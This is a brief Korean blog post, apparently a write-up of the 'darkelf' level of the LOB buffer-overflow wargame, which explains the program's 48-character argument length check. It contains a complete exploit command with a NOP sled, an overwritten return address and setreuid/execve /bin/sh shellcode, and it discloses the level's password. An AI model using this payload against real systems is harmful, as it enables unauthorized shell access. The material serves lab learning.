Wargame/CTF(Capture The Flag)

LOB darklf

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 15.
728x90
반응형


소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.

첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다.


일단 앞과 똑같이 진행하고


payload를 작성때 

./darkelf  $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') <= 첫번째 인자(buffer+AAAA+ret주소값)

 $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')<=2번째인자( NOP+쉘코드)


password : kernel crashed



728x90
반응형

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

pwnable.kr shellshock  (0) 2015.10.11
LOB orge  (0) 2015.09.15
LOB wolfman  (0) 2015.09.15
LOB orc  (0) 2015.09.15
LOB goblin  (0) 2015.09.15

댓글0

💲 추천 글